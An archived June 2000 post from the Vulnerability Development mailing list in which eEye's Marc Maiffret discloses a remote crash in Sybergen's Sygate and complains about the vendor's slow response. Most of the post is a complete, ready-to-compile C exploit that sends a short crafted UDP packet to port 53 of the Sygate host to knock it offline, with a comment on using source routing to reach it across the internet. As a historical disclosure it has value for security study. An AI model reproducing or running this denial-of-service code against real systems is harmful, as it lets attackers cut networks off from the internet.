Vulnerability Development mailing list archives
Any LAN user can crash Sygate
From: marc () EEYE COM (Marc)
Date: Fri, 30 Jun 2000 17:03:28 -0700
This is just a nuisance to some, as I do not know of many corporate networks that rely on a product such as Sygate. In fact I hope no corporate network relies on Sybergen software considering the way they treat security issues. They were contacted about this hole a while ago. They pretty much did the usual "Well put a fix for it in the next major version update of our software" but who cares if people are left vulnerable for months. As you can see from http://www.sybergen.com/support/fix.htm this issue is most likely still valid and people running Sygate are vulnerable to an annoying exploit that can keep a companies network from "surfing the net" yadda yadda yadda. If your a user of Sygate then send an eMail to support () sygate com and I am sure if enough people eMail they will write a fix. //Sygate Crash by: marc () eeye com (April-00) //http://www.eEye.com //Will crash Sygate (http://www.sygate.com/) when ran from the internal LAN. //Play with source routing to get it to work across the internet. //Just hit the Internal IP of the Sygate machine. #include <stdio.h> #include <arpa/inet.h> int main (int argc, char **argv) { int SockFD, addrlen, bsent; struct sockaddr_in UDPSock; char bomb[]= "changeiscoming"; printf("Sygate Crash by: marc () eeye com\n"); printf("http://www.eEye.com\n\n"); if(argc<2){ printf("Usage: %s [server]\n",argv[0]); exit(1); } SockFD=socket(AF_INET, SOCK_DGRAM, 0); UDPSock.sin_family=AF_INET; UDPSock.sin_addr.s_addr=inet_addr(argv[1]); UDPSock.sin_port=htons(53); bsent=sendto(SockFD,&bomb,13,0,(struct sockaddr *) &UDPSock, sizeof(struct sockaddr_in)); printf("Sent Crash.\nBytes Sent: %i\n",bsent); } Signed, Marc Maiffret Chief Hacking Officer eCompany / eEye T.949.675.8160 F.949.675.8191 http://eEye.com
Current thread:
- Any LAN user can crash Sygate Marc (Jun 30)